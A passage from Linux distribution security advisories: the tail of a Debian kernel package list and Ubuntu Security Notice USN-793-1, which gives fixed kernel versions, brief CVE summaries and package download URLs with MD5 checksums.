http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.8etch2_s390.deb Size/MD5 checksum: 1502142 d742c3ccecaeae89dd72efa337ad8d77 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.8etch2_s390.deb Size/MD5 checksum: 194364 95a4fc8d1329f3926c95d0d866ea95c1 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_s390.deb Size/MD5 checksum: 3429940 46b5705e72023ec8eabbeaaae179df0f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.8etch2_s390.deb Size/MD5 checksum: 194060 0c71ba7ea8c4108e88ce439c83e36101 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_s390.deb Size/MD5 checksum: 82228 f6a160399eb50aed5c7ce0a802977eec http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.8etch2_s390.deb Size/MD5 checksum: 82242 20fa5214b693fd929327b65dff5ec749 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.8etch2_s390.deb Size/MD5 checksum: 7200766 c6697bcd7109bad0fd2742368bfc7173 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.8etch2_s390.deb Size/MD5 checksum: 6950228 2c118466985f0d41c074e3d7ae019d4e

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_sparc.deb Size/MD5 checksum: 82354 917940e7cc2b2ae64b7b13119c8d5cdf http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.8etch2_sparc.deb Size/MD5 checksum: 263544 e8b14218397904ab5f792a659c713900 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.8etch2_sparc.deb Size/MD5 checksum: 13317316 74c832fd75da1e42442c1fc2fb985454 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_sparc.deb Size/MD5 checksum: 3650988 92f721bff0660a92cff31845e3db2b09 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.8etch2_sparc.deb Size/MD5 checksum: 261690 519b6d40d8fc3af21f475b10bfaef609 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.8etch2_sparc.deb Size/MD5 checksum: 82374 8ff85603936f91294ec959d8fbca1db5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.8etch2_sparc.deb Size/MD5 checksum: 13019920 db00ad3ea888c38b94f6e9c2aebbd834

These changes will probably be included in the oldstable distribution on its next update. =========================================================== Ubuntu Security Notice USN-793-1 July 02, 2009 linux, linux-source-2.6.15 vulnerabilities CVE-2009-1072, CVE-2009-1184, CVE-2009-1192, CVE-2009-1242, CVE-2009-1265, CVE-2009-1336, CVE-2009-1337, CVE-2009-1338, CVE-2009-1360, CVE-2009-1385, CVE-2009-1439, CVE-2009-1630, CVE-2009-1633, CVE-2009-1914, CVE-2009-1961 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS: linux-image-2.6.15-54-386 2.6.15-54.77 linux-image-2.6.15-54-686 2.6.15-54.77 linux-image-2.6.15-54-amd64-generic 2.6.15-54.77 linux-image-2.6.15-54-amd64-k8 2.6.15-54.77 linux-image-2.6.15-54-amd64-server 2.6.15-54.77 linux-image-2.6.15-54-amd64-xeon 2.6.15-54.77 linux-image-2.6.15-54-hppa32 2.6.15-54.77 linux-image-2.6.15-54-hppa32-smp 2.6.15-54.77 linux-image-2.6.15-54-hppa64 2.6.15-54.77 linux-image-2.6.15-54-hppa64-smp 2.6.15-54.77 linux-image-2.6.15-54-itanium 2.6.15-54.77 linux-image-2.6.15-54-itanium-smp 2.6.15-54.77 linux-image-2.6.15-54-k7 2.6.15-54.77 linux-image-2.6.15-54-mckinley 2.6.15-54.77 linux-image-2.6.15-54-mckinley-smp 2.6.15-54.77 linux-image-2.6.15-54-powerpc 2.6.15-54.77 linux-image-2.6.15-54-powerpc-smp 2.6.15-54.77 linux-image-2.6.15-54-powerpc64-smp 2.6.15-54.77 linux-image-2.6.15-54-server 2.6.15-54.77 linux-image-2.6.15-54-server-bigiron 2.6.15-54.77 linux-image-2.6.15-54-sparc64 2.6.15-54.77 linux-image-2.6.15-54-sparc64-smp 2.6.15-54.77

Ubuntu 8.04 LTS: linux-image-2.6.24-24-386 2.6.24-24.55 linux-image-2.6.24-24-generic 2.6.24-24.55 linux-image-2.6.24-24-hppa32 2.6.24-24.55 linux-image-2.6.24-24-hppa64 2.6.24-24.55 linux-image-2.6.24-24-itanium 2.6.24-24.55 linux-image-2.6.24-24-lpia 2.6.24-24.55 linux-image-2.6.24-24-lpiacompat 2.6.24-24.55 linux-image-2.6.24-24-mckinley 2.6.24-24.55 linux-image-2.6.24-24-openvz 2.6.24-24.55 linux-image-2.6.24-24-powerpc 2.6.24-24.55 linux-image-2.6.24-24-powerpc-smp 2.6.24-24.55 linux-image-2.6.24-24-powerpc64-smp 2.6.24-24.55 linux-image-2.6.24-24-rt 2.6.24-24.55 linux-image-2.6.24-24-server 2.6.24-24.55 linux-image-2.6.24-24-sparc64 2.6.24-24.55 linux-image-2.6.24-24-sparc64-smp 2.6.24-24.55 linux-image-2.6.24-24-virtual 2.6.24-24.55 linux-image-2.6.24-24-xen 2.6.24-24.55

Ubuntu 8.10: linux-image-2.6.27-14-generic 2.6.27-14.35 linux-image-2.6.27-14-server 2.6.27-14.35 linux-image-2.6.27-14-virtual 2.6.27-14.35

Ubuntu 9.04: linux-image-2.6.28-13-generic 2.6.28-13.45 linux-image-2.6.28-13-imx51 2.6.28-13.45 linux-image-2.6.28-13-iop32x 2.6.28-13.45 linux-image-2.6.28-13-ixp4xx 2.6.28-13.45 linux-image-2.6.28-13-lpia 2.6.28-13.45 linux-image-2.6.28-13-server 2.6.28-13.45 linux-image-2.6.28-13-versatile 2.6.28-13.45 linux-image-2.6.28-13-virtual 2.6.28-13.45

After a standard system upgrade you need to reboot your computer to effect the necessary changes.

ATTENTION: Due to an unavoidable ABI change for Ubuntu 8.04 and 8.10, the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well.

Details follow:

Igor Zhbanov discovered that NFS clients were able to create device nodes even when root_squash was enabled. An authenticated remote attacker could create device nodes with open permissions, leading to a loss of privacy or escalation of privileges. Only Ubuntu 8.10 and 9.04 were affected. (CVE-2009-1072)

Dan Carpenter discovered that SELinux did not correctly handle certain network checks when running with compat_net=1. A local attacker could exploit this to bypass network checks. Default Ubuntu installations do not enable SELinux, and only Ubuntu 8.10 and 9.04 were affected. (CVE-2009-1184)

Shaohua Li discovered that memory was not correctly initialized in the AGP subsystem. A local attacker could potentially read kernel memory, leading to a loss of privacy. (CVE-2009-1192)

Benjamin Gilbert discovered that the VMX implementation of KVM did not correctly handle certain registers. This only affected 32bit hosts. Ubuntu 6.06 was not affected. (CVE-2009-1242)

Thomas Pollet discovered that the Amateur Radio X.25 Packet Layer Protocol did not correctly validate certain fields. A remote attacker could exploit this to read kernel memory, leading to a loss of privacy. (CVE-2009-1265)

Trond Myklebust discovered that NFS did not correctly handle certain long filenames. Only Ubuntu 6.06 was affected. (CVE-2009-1336)

Oleg Nesterov discovered that the kernel did not correctly handle CAP_KILL. (CVE-2009-1337)

Daniel Hokka Zakrisson discovered that signal handling was not correctly limited to process namespaces. Only Ubuntu 8.04 was affected. (CVE-2009-1338)

Pavel Emelyanov discovered that network namespace support for IPv6 was not correctly handled. Only Ubuntu 8.10 and 9.04 were affected. (CVE-2009-1360)

Neil Horman discovered that the e1000 network driver did not correctly validate certain fields. (CVE-2009-1385)

Pavan Naregundi discovered that CIFS did not correctly check lengths when handling certain mount requests. (CVE-2009-1439)

Simon Vallet and Frank Filz discovered that execute permissions were not correctly handled by NFSv4. A local user could bypass permissions and run restricted programs, possibly leading to an escalation of privileges. (CVE-2009-1633)

Mikulas Patocka discovered that /proc/iomem was not correctly initialized on Sparc. Ubuntu 6.06 was not affected. (CVE-2009-1914)

Miklos Szeredi discovered that OCFS2 did not correctly handle certain splice operations. Ubuntu 6.06 was not affected. (CVE-2009-1961)

Updated packages for Ubuntu 6.06 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.77.diff.gz
  Size/MD5:  3001537 eba4f5e0c7a98a38dea67bfa3e168240
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.77.dsc
  Size/MD5:     2400 4ddbb75d160d27e0385fbabe7f1ee16a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
  Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-54.77_all.deb
  Size/MD5:  5167494 b57a1f066e6e27335636d97032bac1e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-54.77_all.deb
  Size/MD5:    95350 6585056cad015d6ca7e28ab593cd8b69
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.77_all.deb
  Size/MD5: 44742940 96f1bf40f8e1197b05d8cc2892f2c145

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    22354 a8efeb55cc67813d523cce4e9a8540ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    44770 ceb8d616dcdd3e0acd2c5f1bc0957167
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:     2306 13cb4639cc7517e3111efdea783b906e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    36252 5ef331e5a71c799d054ed67e1af7afb6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:   102298 94937c4a9294258227c971c9c5e05c5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    38894 eb294ea73d31f1c2f9fda6618ec63770
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    49144 b633a70773bbbe8acf959b99056c8117
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:   176712 02c0b79f0fa0b1ebf343781974474a4e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    36776 8a9d598a72f8199cafd120f3aec583c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:   142248 3adf2b7652974e829eaeb41d822a5011
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    51070 25ec529d7f82bfb0ddcd981304434934
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:   140616 bf360bdcf71309b158123ce3070aaaf9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:   286860 041ee91c6050c552bd52930dfb7c9f6b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    97798 b66af76803a50cf7a3b22c2fbb9f00b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:  1651646 756c6cea34752f0bf7a1e829db020e57
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-generic_2.6.15-54.77_amd64.deb
  Size/MD5:   871700 f51a4a973ece89338d4843d27a5ced94
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-k8_2.6.15-54.77_amd64.deb
  Size/MD5:   872620 cef392fe29c4a2dcfa1ffb9607f990eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-server_2.6.15-54.77_amd64.deb
  Size/MD5:   872046 e9a140b82a6800dd7c08d8b744e75e2f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-xeon_2.6.15-54.77_amd64.deb
  Size/MD5:   872590 46b39ade35d2e36728d913fe84b6f79d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_amd64.deb
  Size/MD5:  6925720 a40915984f97b8e817774d8d56155484
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-generic_2.6.15-54.77_amd64.deb
  Size/MD5: 20816072 98817474a9a662d4c5d79811547b98ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-k8_2.6.15-54.77_amd64.deb
  Size/MD5: 20785638 cbf0cd088aeff7b0b87df905b9e8468f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-server_2.6.15-54.77_amd64.deb
  Size/MD5: 21630872 f56a80007a836fec66ef9a2a94883d97
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-xeon_2.6.15-54.77_amd64.deb
  Size/MD5: 19903700 98158564170bf417e3ba7f91263f5f31
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    15646 3894b718b3d312c48c92d9ac52252e5d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:   240370 a8ee1ef17d8c778484a1b5fdc14777b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:   202636 2fbb7c2f21624e8c39388ac167f1bca3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:  1048602 97b108097bf19f308240d1413ad38b64
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:  1542980 c57046562d168b6e8ee13a25fea0347c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:   161648 c9463e7a0ebb0c3879f7a6d644751c85
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:     9832 88ec0bfa3382802a777bcbf9dc7d2220
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    80862 c850080cdc776aabab0c7e0e89cdb13d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    49172 99f5fcc78a1beea9bbbf9cb455c45707
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    35168 9a07d29dedcbed5a44079e64e2bfc911
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    70884 86d8342ace381ebf07b2f4ead760797c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:     6224 55a1df7fa8889b89cd3a009d2d84cbb0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:     9060 9805d4d7b24730a66d881ec8ffccc203
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    57898 4a0c6ab2237785c56a140bb82818578a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:   123332 cfa831d03acaba7fdcd38cc296245fd7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:   101028 f5be2f6c6c299d7c732b59fbfc2ea586
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    79250 a59e9df8e087eac06df9fbda8a8a6405
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:  1594790 0bc41203b7830a51a6e1a1b9f981ab15
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    72306 6acc47f96a766cc043ee2a4f47edd3d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    12654 5a615c1146e10d37ef89d0d2ffaf770e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    33736 850c53ba72802eba8128f9c69786b663
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:   138534 82827eb2785d66387e75873bcbcb84f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:    38938 bb5ec1051b41c083cdd18225b4f0ac24
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb
  Size/MD5:   278746 1a19131977b00e345ca43f2da7d78f60

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    18976 cc2753f5656925c3015c39979cb8cff3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    43460 a322e932de50b99745f263a9c2d07e00
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:   105212 c109dd4fd0061a526e506e6419e71b24
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:     2286 47108cbcb70c3749d2b045c6f8c1a1c7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    34576 df9c1643a4d064f3db582744ad47a9e0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    96952 0fa666be29393ff121f0ff64c45495ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    37102 f4f2833e372e12fabc8237f05e45bf6d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    44078 cdcdb874e1bc26abeec66c66c39dd6e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:   167754 575f5b4208371c2e5d11fdd1d8856119
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    33938 8578c3357a6f1ddfddaf863d2ac2cfb4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:   137870 f46efe5131f63f6f6ee7757d1418b81d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    46894 7dc4dc6732d97dcf4ec8e854f5f563c6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:   132998 a70d2f28ac9f08ef9b505fbe034fa9e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:   273450 d6d45586cf1dfff150b030e9ef3de755
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:   102260 7216111ca2c37fc6ef3d6757254f8261
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:  1596062 4d81a723f97979546f7a7032411e88ff
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-386_2.6.15-54.77_i386.deb
  Size/MD5:   863226 924f92be148cb1bb13db4f7252fd644c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-686_2.6.15-54.77_i386.deb
  Size/MD5:   858374 ddd82deb53082e6ce4b6791ed14dd44f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-k7_2.6.15-54.77_i386.deb
  Size/MD5:   859558 59451d436d231e187ec193aa4abfe1fc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-server-bigiron_2.6.15-54.77_i386.deb
  Size/MD5:   867408 e88f0427e3f965f7c8cfd10cf65255a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-server_2.6.15-54.77_i386.deb
  Size/MD5:   859510 ff4d32a7389bf7ecdb224525699c1868
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_i386.deb
  Size/MD5:  6917458 fd0a57262224b5c9c03b392deee6dba2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-386_2.6.15-54.77_i386.deb
  Size/MD5: 21712838 ce53ee29a36dd9cd9228176e6a67d0cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-686_2.6.15-54.77_i386.deb
  Size/MD5: 22508152 f8977584a67f926bce6e172b61d483cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-k7_2.6.15-54.77_i386.deb
  Size/MD5: 22255354 85be88ae00e9c10d859985cfe320b9ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-server-bigiron_2.6.15-54.77_i386.deb
  Size/MD5: 23618958 0dd94a3c4bc391252914ef536a049eaf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-server_2.6.15-54.77_i386.deb
  Size/MD5: 23173694 36c092afcfd842937423257362deb71d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    15510 9bfea12610a193ecbf077c7dc10b67a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:   238530 0d6767483144ccbdfb4d5496dfa1b890
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:   197046 b779aa690688bd0ce620b3feed37c72f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:  1048392 251f698fe32b7aa18b52b8c930d997a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:  1740818 be462a74a24ef70208e5af89879da1fb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:   160828 bee9438c9a9c524335bbde0b07be1313
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:     9166 1f281ddb8155bd44eca2c0097bd3412e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    76484 024d47a314d9e6567fb071e2814622d1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    53256 456e910d9e3bde1047c24daef0b5658e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    33054 3b0bc0f0738ca6080dd9446a54b22ac7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:    85630 b46b2de723e39a047552d1bf53422286
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb
  Size/MD5:     6028 efd9e548799433f47e80be328f92e779
